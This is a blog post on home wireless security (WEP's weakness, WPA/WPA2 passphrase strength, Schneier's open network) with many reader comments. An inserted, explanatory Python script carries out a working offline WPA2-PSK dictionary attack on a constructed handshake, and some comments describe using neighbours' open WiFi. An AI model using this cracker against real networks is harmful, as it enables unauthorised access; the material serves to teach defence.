June 29, 2008
Bruce Schneier is something of a legend in the computer security community. He's the author of the classic, oft-cited 1994 book Applied Cryptography, and the designer of several well-known ciphers, Blowfish and Twofish among them.
The cheeky Norris-esque design above is a reference to the placeholder names (Alice, Bob, and friends) commonly used in textbook examples of shared secret key exchange.
What I find most interesting about Bruce, however, is that he has moved beyond treating computer security as a problem that can be solved with increasingly clever cryptography algorithms:
Schneier now denounces his early success as a naive, mathematical, and ivory tower view of what is inherently a people problem. In Applied Cryptography, he implies that correctly implemented algorithms and technology promise safety and secrecy, and that following security protocol ensures security, regardless of the behavior of others. Schneier now argues that the incontrovertible mathematical guarantees miss the point. As he describes in Secrets and Lies, a business which uses RSA encryption to protect its data without considering how the cryptographic keys are handled by employees on "complex, unstable, buggy" computers has failed to properly protect the information. An actual security solution that includes technology must also take into account the vagaries of hardware, software, networks, people, economics, and business.
This is the programming equivalent of realizing that Peopleware is ultimately a much more important book than The Art of Computer Programming. The shift in focus from algorithms to people is even more evident if you frequent Bruce's excellent blog, or read his newest books Practical Cryptography and Beyond Fear.
As much as I respect Bruce, I was surprised to read that he intentionally keeps his wireless network open.
Whenever I talk or write about my own security setup, the one thing that surprises people – and attracts the most criticism – is the fact that I run an open wireless network at home. There's no password. There's no encryption. Anyone with wireless capability who can see my network can use it to access the internet.
I've advocated WiFi encryption from the day I owned my first wireless router. As I encountered fewer and fewer open WiFi access points over the years, I viewed it as tangible progress. Reading Bruce's opinion is enough to make me question those long held beliefs.
It's a strange position for a respected computer security expert to advocate. But I think I get it. Security is a tough problem. If you take the option of mindlessly flipping a WPA or WEP switch off the table, you're now forced to think more critically about the security of not only your network, but also the fundamental security of the data on your computers. By advocating the radical idea that your wireless network should be intentionally kept open, Bruce is attempting to penetrate the veil of false algorithmic security.
I may understand and even applaud this effort, but I don't agree. Not because I'm worried about the security of my data, or any of the half-dozen other completely rational security arguments you could make against intentionally keeping an open wireless network. My concerns are more prosaic. I desperately want to protect the thin sliver of upstream bandwidth my provider allows me. Some major internet providers are talking about monthly download caps, too. Bruce's position only makes sense if you have effectively unlimited bandwidth in both directions. Basically, I'm worried about the tragedy of the bandwidth commons. As much as I might like my neighbors, they can pay for their own private sliver of bandwidth, or knock on my door and ask to share if they really need it.
So, to me at least, enabling wireless security is my way of ensuring that I get every last byte of the bandwidth I paid for that month.
It's worth realizing, however, that wireless security is no panacea, even in this limited role. Given a sufficiently motivated attacker, every wireless network is crackable.
With that in mind, here are a few guidelines.
- WEP = Worthless Encryption Protocol
WEP, the original encryption protocol for wireless networks, is so fundamentally flawed and so deeply compromised it should arguably be removed from the firmware of every wireless router in the world. It runs RC4 with a 24-bit initialization vector, and statistical attacks on captured traffic recover the key outright, with no guessing involved: any vaguely modern laptop can crack WEP in under a minute. If you choose WEP, you have effectively chosen to run an open wireless network. There's no difference.
- WPA requires a very strong password
The common "personal" (PSK) variant of WPA is quite vulnerable to brute force dictionary attacks. An attacker only needs to sniff the four-way handshake a client exchanges with your router when it joins (and can force a client to rejoin by sending it a forged deauthentication frame). That handshake contains everything needed to test candidate passphrases offline, which means an unlimited amount of computing power could potentially be marshalled against your password without ever touching your network again. While brute force attacks are still for dummies, most people are, statistically speaking, dummies. They rarely pick good passwords. If ever there was a time to take my advice on using long passphrases, this is it. Experts recommend you shoot for a 33 character passphrase.
- Pick a unique SSID (name) for your wireless network
Default wireless network names just scream I have all default settings! and attract hackers like flies to honey. There's a cryptographic reason, too: WPA derives its key from your passphrase using the SSID as the salt, so pre-generated tables (commonly called rainbow tables) exist that cover thousands of candidate passphrases for common SSIDs like linksys and default. A unique SSID forces the attacker to start from scratch.
- Use WPA2 if available
As of 2006, WPA2 is required on any router that bears the WiFi certification. WPA2, as the name might suggest, is designed to replace WPA. Where WPA was a stopgap built on the same RC4 cipher as WEP (via TKIP), WPA2 uses AES in CCMP mode, which has stronger and more robust security. Note that WPA2-Personal still derives its key from your passphrase exactly the way WPA does, so the passphrase advice above applies just as much. There's no reason to use anything less, unless your hardware doesn't support it. And if that's the case, get new hardware.
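The offline attack described under the WPA and SSID points above, as an added example that is not part of the original post. This is Python I wrote for illustration; the SSID, MAC addresses, nonces, passphrase and the "captured" handshake frame are all constructed here (not real traffic), and the EAPOL-Key frame is a minimal stand-in for message 2 of the handshake. The key derivation itself is the genuine one: PBKDF2-HMAC-SHA1 with 4096 rounds and the SSID as salt, then the 802.11i PRF-512 and the truncated HMAC-SHA1 MIC that WPA2/CCMP uses. It shows why one sniffed handshake is enough to attack the passphrase offline, and why a unique SSID defeats precomputed tables.

```python
import hashlib
import hmac
import struct

# Everything below is constructed for illustration; none of it is real traffic.
SSID = b"linksys"
AP_MAC = bytes.fromhex("00112233aabb")      # authenticator address (AA)
STA_MAC = bytes.fromhex("66778899ccdd")     # supplicant address (SPA)
ANONCE = bytes(range(32))                   # nonce sent by the AP in message 1
SNONCE = bytes(range(32, 64))               # nonce sent by the client in message 2
TRUE_PASSPHRASE = "dragon2008"              # the secret the attacker does not know

MIC_OFFSET = 81   # byte offset of the 16-byte MIC inside the EAPOL-Key frame built below


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA/WPA2-Personal key derivation: PBKDF2-HMAC-SHA1, 4096 rounds, 32-byte output.
    The SSID is the salt, which is why precomputed tables are only useful per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: expand the PMK with both MACs and both nonces into the 64-byte PTK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes = 80 bytes, truncated to 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    The KCK is the first 16 bytes of the PTK."""
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key frame laid out like message 2 of the 4-way handshake (constructed)."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: version 2 (HMAC-SHA1), pairwise, MIC present
            + b"\x00\x10"                # key length
            + b"\x00" * 7 + b"\x01"      # replay counter
            + snonce + b"\x00" * 16      # nonce, key IV
            + b"\x00" * 8 + b"\x00" * 8  # key RSC, key ID
            + mic + b"\x00\x00")         # MIC, key data length (no key data)
    return b"\x01\x03" + struct.pack(">H", len(body)) + body   # EAPOL v1, type Key


def captured_handshake() -> bytes:
    """Stand-in for what a sniffer sees: message 2 carrying a valid MIC under TRUE_PASSPHRASE."""
    kck = ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_eapol_msg2(SNONCE, eapol_mic(kck, build_eapol_msg2(SNONCE)))


def crack_psk(frame, ssid, aa, spa, anonce, snonce, wordlist):
    """Offline dictionary attack: derive the KCK for each candidate and compare MICs.
    Nothing here talks to the network; the captured frame plus MACs and nonces is all it needs."""
    observed = frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), observed):
            return candidate
    return None


if __name__ == "__main__":
    frame = captured_handshake()
    words = ["password", "letmein", "qwerty", "dragon2008"]   # constructed wordlist
    print("recovered:", crack_psk(frame, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, words))
    # The salt is the SSID: the same passphrase gives a different PMK on a renamed network,
    # so a table precomputed for "linksys" is useless against a network with a unique name.
    print(pmk_from_passphrase("dragon2008", b"linksys") == pmk_from_passphrase("dragon2008", b"my-unique-net"))
```

Each candidate costs 4096 HMAC-SHA1 rounds in pmk_from_passphrase, which is the only thing slowing the attacker down; that cost is exactly what precomputed per-SSID tables pay in advance, and exactly what a long random passphrase multiplies beyond reach. The original WPA (TKIP, key descriptor version 1) uses HMAC-MD5 for the MIC instead of HMAC-SHA1, but the passphrase-to-PMK step is identical, so the attack is the same.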
In the end, perhaps wireless security is more of a deterrent than anything else, another element of defense in depth. It's important to consider the underlying message Bruce was sending: if you've enabled WEP, or WPA with anything less than a truly random passphrase of 33 characters, you don't have security.
You have the illusion of security.
And that is far more dangerous than no security at all.
Posted by Jeff Atwood
I would think that if your ISP ever accused you of violations in the terms of service, you would certainly like to know if it were you and not some nosy teenager within range running a bunch of Pirate Bay seeds.
My router should be configured with some level of security to disprove negligence on my part. With a layer of security in place, however superficial, I can say that someone had to hack into my network. This, I argue, stands to relieve me of responsibility for that person's actions. I don't want the RIAA or MPAA coming after me. :)
If you choose WEP, you have effectively chosen to run an open wireless network. There's no difference.
I disagree. Computer security as such doesn't exist; it is an illusion, and if you don't know that, that is the first and biggest problem you have.
ALL you can do is raise the bar as high as you can, and as weak as WEP can be, it does prevent most people from connecting, and for most people that's the only purpose.
For me, protecting my wireless connection is necessary simply because of the RIAA and MPAA. The thought of being sued for thousands of dollars just because I was too lazy to password protect my WiFi router makes me quite sad and mad at the same time.
I have already received a warning from my ISP because someone was using my unprotected WiFi connection to download WinXP. After that email, I locked down my router and that, they say, was that.
not subverting the security of your encryption itself
He didn't say the *encryption* is crackable. He said the *network* is, which is true, as you admit yourself. Anybody even remotely involved with security will tell you that these days, encryption is rarely being broken by attacking the algorithm itself -- it's a waste of time; implementations are often so poor you're better off attacking weaknesses in the implementation (or, of course, simply confusing people into giving you the access you needed).
I'd say the blame should go to whoever designed such an unusable security system for WiFi.
In a context like a corporate network, manned with an army of system administrators, the current way of managing WiFi network security makes perfect sense. Some security guru makes a decision to use this or that encryption, mandates that its passwords shall be 300-character-long Klingon haikus, and sends his henchadmins to configure all company devices accordingly.
Meanwhile I have exactly one laptop, one wireless router and no spare system administrators to set them up. Since I have physical access to both my laptop and my router, why can't I just push a button on both to make them seek each other and negotiate an encryption and its password? Something similar already works fine on Bluetooth; it's otherwise poorly designed, but the basic idea is good.
Obviously that sort of system wouldn't replace the flexibility of just writing a network password for inaccessible routers, but it would eliminate configuration difficulties on private routers.
With an open network, the RIAA or MPAA are the least of your worries. All it takes is one freeloader hitting a child pornography site with your IP address to ruin your life. By the time you prove it wasn't you (assuming you even can), the damage has been done. That, more than anything else, is reason to lock down your network.
As for the DS - they sell a USB WiFi adapter for it; you can plug that into your PC and bridge the connection, allowing you to use WPA for the rest of your network.
For that matter, add a MAC filter and turn off SSID broadcasting; they're trivial measures to beat, but every little roadblock pushes the freeloaders toward your (easier to exploit) neighbors.
MAC whitelisting is a false sense of security. It is easily possible to change the MAC address of a device (in software). And the MAC is in the unencrypted part of a WiFi packet. Therefore you only need to capture one packet to get a valid, whitelisted MAC.
Any cryptographic, social or physical lock is always best attacked and defeated at the weakest point.
Failure of security is (almost) always due to the squishy bits found between keyboards and monitors. Attack there.
Example: You generated an 8192-bit private/public key pair, and then applied a password to that private key for its protection. Fine, breaking the generated key would presently require eternity or quantum computing (barring algorithmic flaws). But, the fact that the private key password is your pet dog's name, just because it's easy to remember and to type for you ... well, as soon as someone gets your 'password protected' private key file by whatever means, the squishy bit which decided to use your pet dog's name has ensured that the locks protected by it will be compromised in short order.
To try to combat this, the logic which is (and should be) applied is one of an onion skin. It's not a single layer which will protect you, but multiple layers, each (unfortunately) with their own squishy bits. Any one of these layers may be 'broken' in sequence, but it is the depth of these layers which will keep you (as best as can be hoped for) secure. A critical fact which many miss, is that each of these layers also needs to be independent and distinct from each other in order to be effective. Chaining the 'locks' is all too common, and often once the first key is in the lock, all other tumblers fall easily.
Using the example of Wireless Security:
For a personal home user, they could readily set up difficult to break security with relatively inexpensive equipment - i.e. just a suitable Wireless Router and a (PC based) firewall.
Configure Wireless Router to WPA-PSK appropriately.
Apply MAC filtering to only permit specific devices to connect to the Router.
Disable DHCP and use fixed IP addresses (just because we can).
Connect it to the firewall and create a Blue(Wireless) Network interface.
Only permit the MAC address of the Wireless Router for Blue Access.
Configure the firewall to only permit a VPN tunnel from Blue(Wireless) to Green(Internal).
Generate the corresponding key pair for the VPN access requirements.
Protect the internal machines (Windows/Linux) with suitable network access requirements (Domain/Workgroup/Usernames/Passwords/etc.)
From the onset, it would appear that we have to break, in order, WPA-PSK, then the Router's MAC filtering, then determine the network address range, then the firewall MAC filtering, then the firewall VPN tunnelling, then the target machine security ... sounds hard, and it would be.
However, examine the actual 'lock' usage case of the (assumed) 'squishy bit' user's laptop ... which was left sitting on the desk ...
Open the door, smash a window, use social engineering, whatever means for access ...
(Domain/Machine) Logon Password = pet dog's name.
The laptop will then log in, auto-connect to the wireless network (saved configuration), run up the VPN connection, and use the (already supplied or saved) password to connect to the network shares and/or domain, regardless of the WPA-PSK and VPN passwords chosen, or the length of VPN Keys used.
Impossible to crack locks have all tumbled in order. One very weak password, and we're done.
The locks broken in this case were the physical access lock and the social lock (squishy could choose the domain/machine password), which are often not considered.
Then again, maybe it was already left on the desk, logged on ... wouldn't that have been the ultimate in easy?
If you believe every potential entry point is hostile, then the onion skin method makes it as difficult as possible. Unfortunately, it's the best you can do, when dealing with squishy bits.
Never leave the locks unattended when unlocked.
Never chain your locks, for any reason.
And never, ever use weak locks (passwords).
As E.Z. just pointed out, you only have to be more secure than your neighbors are. It's like the old joke about not having to be able to outrun the mountain lion. You only need to be able to outrun your buddy.
The only reason I use WEP is to stop someone from stumbling on to my wifi and stealing my bandwidth. WEP and a simple passcode is enough to keep 99.9% out; for that 0.1%, using WPA or other would make little difference.
Sounds like a job for KeePass.
Try entering a 33 character password on an AppleTV using that crappy remote with the on-screen keyboard :(
An old European house helps even better: the walls are so thick the signal hardly leaks outside :) ^_^ Back to basics, back to physics.
And for the record, I have been working in a famous bank. Its very secure, unusable authentication system was down for one day: the QA team forgot to renew the security certificate in time, and they discovered it in the morning when 15000 users could not log in.
Security relies on the fact there is a chain of competent people doing their job correctly; the longer the chain, the weaker the chain, especially when security gurus claim another complicated tool that elongates the chain is needed to enforce it.
Am I the only one here thinking that one major threat in security is security gurus?
I don't know where you get the "Experts recommend you shoot for a 33 character passphrase" bit from. The page you cite talks about
[...] passphrases longer than 20 characters are needed to start deterring attacks.
Anyway, a really good way to create good passphrases that you still can remember is Diceware http://world.std.com/~reinhold/diceware.html
treating computer security as a problem that can be solved with increasingly clever cryptography algorithms
I'm not with him on this point; cryptography is one way, and I think we could find other, better solutions.
I agree completely ... squishies are the problem. No matter how many layers, no matter how good the technology ... one bad squishy and everything collapses.
Social, physical or cryptographic locks ... leave any one unlocked or weak, and that's where to go attack ...
A competent 'guru' is one who considers everything, and tries to spot the problems without introducing unnecessary complexity to hide the true issue. (i.e. protecting a 4096 Bit key with a dictionary word, unencrypted laptops, auto-login, auto-connect, auto ... anything)
Anywho ... leaving a WiFi network open is equivalent to inviting others to steal from you (bandwidth), to implicate you (copyrighted content), to become you (identity theft), to damage you (malicious destruction), to finance them (botnet, zombie, spam), to ... well, you get the picture. :-)
WEP is fine for me. I don't think many of the chavs in this area have the intelligence necessary to gain access to my network.
Since I live in a less populated area (my neighbors' houses are about 100 feet away in either direction), I don't have many problems with people showing up on my network (I got in the habit of checking the logs fairly regularly and banning mac addresses of my neighbors just so they didn't accidentally log in to my network when I lived in a townhouse). People parked in the street will generally be approached by someone asking if they're lost or making sure they're not up to something.
It comes down to the same idea as not having virus scans running in the background on your computer. If you pay attention to the environment you generally won't have these types of problems.
Of course, if you're in a hostile environment, there's no reason not to take measures to secure yourself, or at least make yourself a less likely target than someone else. If I don't know my neighbors, there are a lot of them, or no one bothers approaching the guy in the strange car parked out front, it's probably a good idea to at least put a couple of roadblocks on the access point, and make sure you have a good lock on the door while you're at it.
The problem with WEP is that it's the only connection option available on my Nintendo DS. DS vs secure network... dude, that's a tough choice.
More important than protecting your bandwidth is protecting your reputation. I see some people here have been warned about people downloading copyrighted material via their connection - what about illegal material? Illegal types of porn or, worse still, terrorist activities. You wouldn't want the authorities knocking on your door and then the battle to prove that it wasn't you that downloaded that stuff - much worse than just some copyright suing contest.
Quick note: I just realised how that could be read. I'm not saying that there are things worse than illegal types of porn; I'm just thinking about British law, etc. allowing you to be locked up for 'x' days without charge on the merest hint of involvement with terrorist activities.
I agree with thing2k - I use wireless encryption solely to keep 99% of potential crackers away from my bandwidth. It is kind of like having 'orange' as a captcha - easy to break, but effective nonetheless.
What's the saying? Locks are there to keep honest people honest.
If all you're worried about is protecting your bandwidth, then WEP is fine. Hell, for that matter, just not broadcasting your SSID should be sufficient.
Depending on where you live, say an area that's not particularly known for being technically literate (let's just say some random city in Kansas for the sake of argument), I would not be at all surprised if in the entire life of your router there is never a single person who has the desire and know-how to defeat either of those precautions.
Even if you are in a technically literate area (say, silicon valley), you still probably don't have anything to worry about. Sure, someone may well access your network... but it's just one person. They're probably not going to affect your bandwidth all that much. If they do, you'll notice it and ban their MAC.
Some people here are worried about getting into trouble with their ISPs for copyright crap, or worse the Feds for illegal crap, stating that it would be a battle to clear your name. Are you serious, people? I assumed most reading this blog were of above average intelligence, I mean here you are discussing cryptography, yet you think it would be hard to clear your name? Hmmm, they have an IP or a MAC that they tied to the download....so? If you've nothing to hide, handing over your hd is trivial. If they can't prove that YOU downloaded the offensive/illegal material (e.g. by finding it on your hd) then you can't be charged for much more than being stupid enough to let your terrorist/child molester neighbors hop onto your network. As they say, possession is 9/10ths of the law. Sure you'll be watched for the next couple months, but after watching you do the stupid innocent crap we all do on the net for a couple months they won't be bothering any time soon.
If your network is open, you can claim in a court that someone else has been using your network to pirate files (especially if no such files were found on your pc).
If your network is closed and secure, you will have to prove that someone hacked in (even though it's EASY to do).
Therefore a secure network is in fact making you less secure by a) not adding much additional security, but b) making you more responsible.
That is one of the reasons Schneier listed in his blog.
Please enter new password:
Sorry, password not long enough!
I thought encryption increased latency since the router has to decrypt traffic. A coworker suggested using MAC address whitelisting. I'm using WEP still because it's the most convenient for all devices. I kind of have this principle in life where I wait for something to happen before I change what I'm doing. If someone hacks my network, then I'll change the settings. It seems to be deterring random people from connecting just fine.
... if you've enabled WEP, or WPA with anything less than a truly random passphrase of 33 characters, you don't have security.
Does that mean you go against your previously stated belief that pass phrases are better than passwords, at least for your wireless access? (July 17, 2005 post) Just curious as to why in this case you would go with a 33 random character password rather than a longer, more complex pass phrase.
This is the programming equivalent of realizing that Peopleware is ultimately a much more important book than The Art of Computer Programming.
Ouch! Are you certain you'd still feel that way if you read the latter?
Bruce is the expert and I'm nobody. I have no qualifications to support my opinion that he really enjoys being contrarian and thus annoying (which is not to say he isn't right). This is based on my observation that he seemed to be criticizing everything everyone else is doing, and making only the most vague positive suggestions. I stopped reading his blog some time ago, so that may not be valid anymore.
So, what do I know? There are several open wireless signals near my home that anyone looking for a signal can use, and I'm a nonentity so my data isn't likely to be targeted, so I feel that my simplistic, childish efforts to lock down my wireless is adequate. I'm not into getting into pi__ing contests with experts.
I desperately want to protect the thin sliver of upstream bandwidth my provider allows me.
Yep. When I first got a wireless router I decided to keep it open in case neighbors wanted to share. A few weeks later, I was trying to play a game and getting a terrible connection... I checked the router and noticed a neighbor using nearly all of my bandwidth downloading stuff.
Now only specified MAC addresses can connect.
@M: "If your network is open, you can claim in a court that someone else has been using your network to pirate files (especially if no such files were found on your pc)."
That is soooo not true. The email I got from my ISP clearly stated that I am responsible for protecting my connection to the internet. If someone gains access to my internet connection due to an unprotected wireless router, I am fully responsible for the data that is transferred.
paul mentioned use of an open WiFi connection that I hadn't even thought about. And just because you live in an area where your neighbors are not very bright, doesn't mean that someone wardriving can't find your open WiFi connection and go to town while sitting in his car. He has to be caught by the police in order to be arrested for such activity. If you have an open WiFi connection, it's unlikely you are going to know that someone is sitting outside your house using your connection that you were unaware of.
These days, it's just downright stupid to leave a wireless router open for anyone to connect to.
Regarding the DS and WEP, I have an Airport I plug in when I want to do an update or play online. That, or I find a free access point like a coffee shop and go from there.
That said, I find it annoying that I need WEP to get my game on :(
I finally have a reason to post a comment.
I use WEP, and I know it is crackable. I don't care and I will tell you why.
My goal is to protect MY bandwidth from roaming neighbors (etc.). Unless you have a crazy hacker as a neighbor, none of the average people will be able to crack your network and bleed it with WEP enabled.
So, if your stated goal is the same as mine (and it seems to be) you have no need for WPA with a 33 character randomly generated password.
Bruce Schneier has it right. However he should at least put WEP on his network to prevent the average person from bleeding his bandwidth.
Timothy F. Brown
Security is always an attempt to leverage against time, money, resources and motivation. WEP is the network's no trespassing sign. It does nothing but tell those with little motivation to stay away.
I think Bruce misses the bigger picture too often. With an open wireless and secure computers, he is keeping his valuables in a big safe, but removing the locks from his front door.
Yeah, most people look at this issue from only one side. They think that WEP/WPA exists merely to keep people out. As in, I don't want them to steal my bandwidth, so I use WPA. Or I don't have anything to hide so I keep the wi-fi open.
The other thing your key does is prove that the access point you are connecting to is really yours.
If your wi-fi is open, your access point is spoofable. There are all kinds of content-injection and mistaken-identity attacks that can be carried out when you consume the internet through a compromised AP, from hijacking Google results to giving you a rootkit-enabled Firefox download.
So if you use open wi-fi, here's a question you should really ponder: how do you know the router you are connecting to is your own?
I live just on the border of a rural area, yet at least one of my neighbors is running a wireless network as well... it used to be on the same channel as mine.
I use WEP for precisely the reason others have mentioned: Not necessarily to protect me, but to prevent casual users from using my network... and because my DS doesn't support anything better (damn you, Nintendo).
Also, there's my neighbor's wide open network in the same range...
I use WPA, a MAC access list and no SSID broadcast. I feel safe.
If my ISP slaps a monthly download cap on me, there is a good chance that a killing spree will ensue.
While I wouldn't recommend WEP, I will say that it isn't totally worthless.
There are a LOT of people who leech off of wireless networks, but have never bothered/learned/tried to crack WEP. In a dorm or apartment complex, even having the poor protection of WEP will often cause leechers to ignore your network and leech from someone else, who is totally unprotected.
Totally agree with the illusion of security. We've been trying to tell that to our group for a while.
Example: at our work, we have to use these electronic keys for the building. We have tons of paperwork to get them, tons of paperwork if we lose them, audits, etc.
Guess what I found out my first day? I got lost on a floor and walked up to the wrong office front. Stuck in my key, beep beep, got in. The receptionist pointed me to the right office, but had she not been there, or been a temp, I could have walked in and done what I wished.
The MAJOR advantage to WEP over completely open is that it stops people from connecting without even realizing they're doing it.
Some people have their laptops configured so that it automatically connects to any open WiFi port. Astonishingly, some of these people DON'T EVEN UNDERSTAND WHERE WIFI COMES FROM. It just works in some places, and doesn't in others. Magic.
If I had lots of bandwidth to spare I'd just let them have it. Why not? But, sadly, I've got a very limited amount of bandwidth that the cable company condescends to let me buy.
I keep my WiFi set to WEP because sometimes I like to connect with my Nintendo DS, which for some reason, doesn't do anything better.
I wish there was an easy way to keep my router open, but only let others use a certain percentage of my bandwidth. I mean, if I was desperate, I'd rather have 10kb/s of free wifi than nothing at all.
Alternately, live in a house far enough away from everything that people would have to sit in your front garden to even get a low signal from your router!
Good article ;)
How timely. I was just re-reading Why Software Sucks by David Platt (http://www.whysoftwaresucks.com/), and the section on security makes specific mention of Bruce Schneier's regrets about his epic book. Platt makes the same point that, like most computing problems, security is a people problem more than a technical one.
Also, coincidentally, I just moved into an apartment complex and one of my neighbors is running an unsecured wireless network with Comcast service. Since I am on lowly dial-up until I build up a sizable savings, I have been enjoying their 11 Mbps with or without their knowledge.
I think this man is very lucky no one in his area jumps onto his Wifi and downloads a movie that's still in the theaters off an unencrypted torrent.
The MPAA would not buy I leave my network open for all to use.
If I were to leave a loaded handgun in my mail box, and some kids found it and shot someone, would the judicial system let me go since I have an open policy with my handguns?
It's sad that this is what it boils down to, but it does. The systems in place to regulate things are terribly far behind when it comes to lawsuits involving what is in my opinion horrifically unfair precedent, that is obviously perpetuated by the money and power of a group of people watching their profits slip away. The judges have to take weeks to have this stuff explained to them. The technology has had a few too many leaps and bounds.
Anyone familiar with the immense fun that can be had wardriving knows WEP/WPA is crackable, but given the severe nature of assumed guilt in these cases, I would get a traditional wired router, and run everything I could off that. Drop the uplink of that to one of the wired ports of a wireless access point that was carefully set up to only allow certain MAC addresses through. You'd still have to watch for spoofing and other methods to break that, but you have to do something.
There are many cases of people being sued by both the RIAA and the MPAA when they are clearly not technologically savvy enough to do so. I believe often these people are the victim of internet hijacking.
My personal method is to literally disable the wireless on the router when it's not in use. My house is already wired for CAT5 so I do have an advantage in this respect, but yea, wired over wireless. Speed, security, it's just better. This day and age, it's beneficial to certain file downloaders to hijack someone else's internet so they bear all the responsibility when the ISP starts sending out warning letters.
Never mind bandwidth throttling, try being brought to trial. D:
Jeff writes, "A few years ago it was easy to find an open one almost anywhere, usually with the default name of Linksys or Netgear. Now it's far less common. No wireless router that I know of comes with WEP or WPA on, so I assumed the general public was getting slowly educated about security."
There are something like 20 routers visible to me, most in the form 2WIRE###. ATT had a new deal out for cable over DSL, and apparently the neighbors loved it. If you think the average consumer has little incentive to care about wireless encryption, ATT certainly isn't caring too hard for them.
Some people have their laptops configured so that it automatically connects to any open WiFi port. Astonishingly, some of these people DON'T EVEN UNDERSTAND WHERE WIFI COMES FROM. It just works in some places, and doesn't in others. Magic.
A great point -- and a valid use of WEP!
I've been surprised how many wireless access points are protected these days. A few years ago it was easy to find an open one almost anywhere, usually with the default name of Linksys or Netgear. Now it's far less common. No wireless router that I know of comes with WEP or WPA on, so I assumed the general public was getting slowly educated about security.
Bruce lives in a very nice neighborhood! THAT is his best security strategy. :-)
Another thing that you might want to experiment with is to name your network with something like, hackers or virus. The fact that it's wide open for anybody to enter makes it even more scary.
Don't lock the doors to your house: it's trivial for anyone to get in anyway. Keep your blinds open: a determined peeping Tom could look in anyway.
I agree with what people above have said: use the security features of your network, just don't think they're perfect.
I use WEP because I want to keep the casual idiot neighbor from (a) stealing bandwidth, (b) downloading illegal or otherwise embarrassing stuff using my internet connection, and (c) providing a modest amount of privacy. I use WEP because I sometimes use an older laptop that doesn't support WPA well.
I doubt I'm going to attract a serious cyber-attacker going after my WiFi. More likely the casual snoop or bandwidth leech. For those, even WEP is pretty good. I'd guess it's illegal to break into a secured wireless network (if push came to shove and you needed to take action against an abuser); might be less clear if you ran an open wifi network.
There is NO reason why you shouldn't use the maximum length WPA password as generated by a random generator (google WPA password generator). A 63 char WPA password is the best you can get with current technology, I think.
I have been using passphrases for a few years already, however (especially for enterprise applications) it is often not accepted - password is too weak.
"It was beautiful day outside and Tom was happy" is less secure than itf4! :(
I guess I don't feel so safe. Ahh well, the only thing I run on wifi is one tv laptop and the Wii.
Why can't we encrypt more of the wifi packet? including the mac and ssid...
Monthly limits is exactly why I want to secure my network.
12 gb limit and above that I pay 1.5 euros for every gb.
So yes, I don't want my neighbours to use my network.
Didn't use WPA though (gave problems with VNC...) but I have my router configured to only give IP addresses to the PCs I have via their MAC address. Seems to work fine.
Of course, my neighbours can still sniff my data and there are workarounds for the MAC address but hey, they're dummies too ;)
I used WEP and I'm really not that concerned that my desperate housewife neighbors are going to crack my wireless network. I would have to say that even crappy WEP is fine 99.9% of the time.
I just have a MAC address whitelist. It keeps the common folk out.
What I'd like is a router that gives the best of both worlds.
- it would have multiple zones and allow multiple forms of encryption
- public, old, and private as follows:
Public would be time-limited and/or restricted bandwidth. It also would discourage persistent mooches by tracking MAC addresses. Public zone can't see any other devices on the network. It can only see the router, and the router could also blacklist or whitelist IPs and domains if you wish.
Old would be for WEP devices that can't use newest protocols, and 'old' can only see private zone computers if enabled on a device-by-device basis. The thinking here is DS-lite and other things that likely don't need full network access nor a strong key (since WEP is broken anyways), but we don't want to compromise the security of the entire network for the sake of a few devices that are rarely used.
Private would be the highest level of encryption. Everything in this zone can see each other by default. This is the internal network.
To round this out, the router would have a display showing usage/activity/etc on the front of the unit, and there would be hard buttons to turn any of the zones on or off. The display would be decent, and not just a couple of LEDs with gray on gray text in an 8 point font.
My own 99 quid 3com router is a braindead piece of sheet, needs the occasional reboot, and was a complete hassle to get it working with WPA on my mac. As far as I can tell, router technology hasn't advanced too much.
My point is we can create a device that gives you reasonable security and choice in a presentable way that even moms and dads can understand.
@Dave: I'm not sure your reasoning is sound in all jurisdictions. Isn't "I didn't do it, my wifi was open" a perfect way to defend yourself if you're accused? Claiming that you didn't do it when your wifi was protected is much harder to pull off.
Strong passwords and white-listing of MAC addresses are the best you can do for your network. With a MAC white-listing, there is no way someone can access your network. And even if they did, through some magical technology, they'd have to have another petaflop or two to crack the strong password. And even if they could do that within 30 days, I change the password and then they'd have to re-petaflop their cracking algorithm.
Even better, keep an open network as a decoy and another one with strong decryption. Let them access your junk network pointing to copies of MSDOS3.3 and such.
If everything else fails, you can always grab the attacker by the WinSocks :))))))
Just because no one has mentioned it so far:
Steve Gibson has an excellent online strong password generator that is ideal for generating a good WPA password.
In the UK, BT routers come with WEP enabled by default and I suspect many providers do the same. Pretty irresponsible really, and arguably worse than shipping with no security enabled at all.
My recent attempt to switch to WPA went OK for Windows but I failed to get my linux laptop to connect (Ubuntu). I must try again sometime.
I personally would not mind letting other people use my WLAN. Regarding bandwidth, that's easy: I'd run a Linux router and make it use priority scheduling. Packets of known hosts will get high priority, everything else will get a low one. That means other people can use only my idle bandwidth. Whenever I need bandwidth, I will get it, slowing down their throughput, but hey, it's my network, my bandwidth, I paid for it, so I can use it whenever I want to. However, most of the time I have a lot of idle bandwidth, so why shouldn't other people be allowed to use it? Also I have unlimited traffic, so I don't have to pay more if other people use it.
